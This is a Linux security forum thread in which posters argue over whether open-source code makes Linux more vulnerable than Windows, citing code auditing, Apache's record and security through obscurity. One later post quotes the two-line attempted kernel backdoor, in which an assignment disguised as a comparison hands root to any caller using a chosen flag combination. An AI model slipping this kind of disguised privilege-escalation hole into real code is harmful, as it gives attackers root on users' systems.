LinuxQuestions.org
Welcome to the most active Linux Forum on the web.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 12-14-2004, 05:04 PM   #1
lynchpin9
LQ Newbie
 
Registered: Sep 2003
Location: va
Distribution: red hat 9
Posts: 7

Rep: Reputation: 0
if linux becomes popular, won't it become more vulnerable than windows


My reasoning is, the linux source-code is free and highly distributable. If someone wanted to do harm, why would I want linux over windows from this perspective? Yes, windows source code is attainable; it just seems linux is more vulnerable than windows. For example, if Red Hat begins to get major market dominance and people in the linux community (or a faction) get pissed at how watered down and proprietary they've become, but still with the source code highly available, it would be easier to do harm.


Josh
 
Old 12-14-2004, 05:15 PM   #2
acid_kewpie
Moderator
 
Registered: Jun 2001
Location: UK
Distribution: Gentoo, RHEL, Fedora, Centos
Posts: 43,378

Rep: Reputation: 1963Reputation: 1963Reputation: 1963Reputation: 1963Reputation: 1963Reputation: 1963Reputation: 1963Reputation: 1963Reputation: 1963Reputation: 1963Reputation: 1963
no it wouldn't be easy to do harm. how do you suppose this dubious person causes harm? if you mean via finding their own miraculous exploit that no one else knows about, then sure, but exploits are much easier to be aware of in linux than windows anyway. By this i mean if anyone wants to check a certain library for a vuln, whatever colour metaphorical hat they wear they can find it. it is then known about and fixed. the only people who can really truely fix a M$ flaw is M$, and they can only be truly identified and understood by others by blind prodding and poking. In Linux you can see there in front of you that lines 1623 to 1627 of imlib.c have been updated to prevent some potential hack or other. being open source doesn't make this worse at all, arguably it makes it better.

If you propose this person was to change the code, then core libraries have more structured code acceptance and patch management systems. Normally only certain people can apply patches etc... there was a recent case where someone appeared to have tried to submit a really subtle patch to a kernel source file that would give anyone root access, but the kernel maintainers saw it and removed it and it never got anywhere close to being accepted. Havnig said that there is a train of thought leading to saynig that while this attempt was found, how do we know others didn't slip through unnoticed?
 
Old 12-14-2004, 05:15 PM   #3
wapcaplet
Guru
 
Registered: Feb 2003
Location: Colorado Springs, CO
Distribution: Gentoo
Posts: 2,018

Rep: Reputation: 48
Simply having the source code available does not make it easier to do harm; in fact, it is widely recognized that having the source open can greatly improve security, since potential security flaws can be found and fixed more quickly than is usually possible in a closed-source model. Cryptographic security, for example, depends on the openness and widely-studied nature of the encryption and decryption algorithm. Nobody would trust crypto that comes out of a black box; it's pretty amazing that we so often trust security-critical software that comes out of a black box.

As Linux becomes more popular, it is more likely to be a target of attacks, but that doesn't make Linux itself inherenly less secure. The Linux environment is more hostile to a potential attacker (especially to viruses) by the nature of its design than, for instance, Windows is. There have been so few attempted (and even fewer successful) attacks on Linux that one could even argue that the greater threat of attack would serve to make Linux even more robust, as flaws are perhaps exploited first, but quickly patched.

The matter of whether a clever cracker could insert malicious code into the Linux kernel seems pretty weak to me, in comparison with whether someone could be inserting malicious code into Windows. With open source, you can at least look at the code for yourself to determine if it's malicious; with Windows, we have to trust the internal auditing of a single company, whose intentions we well know to be less than entirely benign towards users.

Last edited by wapcaplet; 12-14-2004 at 05:20 PM.
 
Old 12-14-2004, 05:20 PM   #4
penguin4
Senior Member
 
Registered: May 2004
Location: california
Distribution: mdklinux8.1
Posts: 1,209

Rep: Reputation: 45
lynchpin9; do not think so. kernel source code is tightly kept by L. Tovald & Consortium. yes we can fiddle around with it but just under strict contents & laws of GNU org. in the manner that u assume it would be detrimental not only
to users but the user that would do something like that maliciuosly,malefic.
unless working for MS, changing source code is a felony.
 
Old 12-14-2004, 06:06 PM   #5
XavierP
Moderator
 
Registered: Nov 2002
Location: Kent, England
Distribution: Lubuntu
Posts: 19,174
Blog Entries: 4

Rep: Reputation: 428Reputation: 428Reputation: 428Reputation: 428Reputation: 428
Moved: This thread is more suitable in Linux-Security and has been moved accordingly to help your thread/question get the exposure it deserves.
 
Old 12-14-2004, 07:59 PM   #6
2damncommon
Senior Member
 
Registered: Feb 2003
Location: Calif, USA
Distribution: Debian Wheezy
Posts: 2,838

Rep: Reputation: 48
When asking a question about software vulnerabilities, one has to start with the fact that software can have vulnerabilities.
This is a fact and non-specific to any OS.
From there two different weak points can be seen. One is the computer user, their habits and needs. The other is the OS and applications themselves.
I am not sure that it can ever be argued that the user is not a huge weak point for vulnerabilities. Do they update, open any file in front of them, understand warning and error messages?
For the actual software the question is how severe of vulnerabilities are common, how quickly are updates available, and how easy are they to acquire and install.
The question about availability of source code preventing or contributing to vulnerabilities is an interesting question and I think that we will have to see how it plays out. I cannot see how it is a given either way.
So do I think Linux will become more vulnerable than Windows? No.
Do I think Linux is invulnerable? No.
 
Old 12-14-2004, 10:21 PM   #7
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
I think one of the more compelling arguement in regards to this question is looking at the security histories of Apache which is open source and is the most commonly deployed webserver versus Microsofts IIS webserver which is closed source and has a smaller market share. So according to that theory Apache should have more vulnerabilities, but in the real world the opposite is true.

@penguin4: Not sure what you're talking about, but finding vulnerabilities in software doesn't require modifying the source code and as such isn't covered by the GPL license. Plus there are no provisions in the GPL for what kind of changes you can make, only that if you modify or make a derivative work, then you must provide the source code for free. In fact, I could take the current 2.6.9-stable kernel source and rewrite the entire network stack without checking bounds of a single buffer and release it as Capt_Caveman's Busted Kernel v 1.0 , and as long as I released the source and used the GPL license it would be perfectly fine.
 
Old 12-14-2004, 10:44 PM   #8
ramram29
Member
 
Registered: Jul 2003
Location: Miami, Florida, USA
Distribution: Debian
Posts: 848
Blog Entries: 1

Rep: Reputation: 47
One sentence explanation:

Security through obscurity.
 
Old 01-25-2006, 05:24 AM   #9
nx5000
Senior Member
 
Registered: Sep 2005
Location: Out
Posts: 3,307

Rep: Reputation: 52
Quote:
Originally Posted by acid_kewpie
Normally only certain people can apply patches etc... there was a recent case where someone appeared to have tried to submit a really subtle patch to a kernel source file that would give anyone root access, but the kernel maintainers saw it and removed it and it never got anywhere close to being accepted.
This was the backdoor that someone tried to put, not so easy to spot. (how one character can break millions of others)

Code:
+       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+                       retval = -EINVAL;
Hiding the source/algorithm doesn't help at all. It's even worth because YOUR TEAM has to audit your code and YOU are the only one who can patch it (and audit the patch.. which was not always the case with micro$oft)

You could make an analogy with cryptography:

All cryptographic mechanism that relies on the secrecy of its algorithm is bad.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Why Windows is so vulnerable to Virus and Worm ? TigerLinux Linux - Software 2 10-15-2005 07:04 AM
does wine make me vulnerable to windows virii? drigz Linux - General 3 08-03-2004 07:29 AM
in what way is Linux less vulnerable than Windows? ryancw Linux - Newbie 18 10-10-2003 03:45 AM
ever wondered why windows is more popular funkytaz10 General 3 09-15-2003 08:42 AM
When UNIX based OS'es be more popular than Windows? Eits0 Linux - General 12 05-18-2002 01:02 PM


All times are GMT -5. The time now is 02:23 AM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration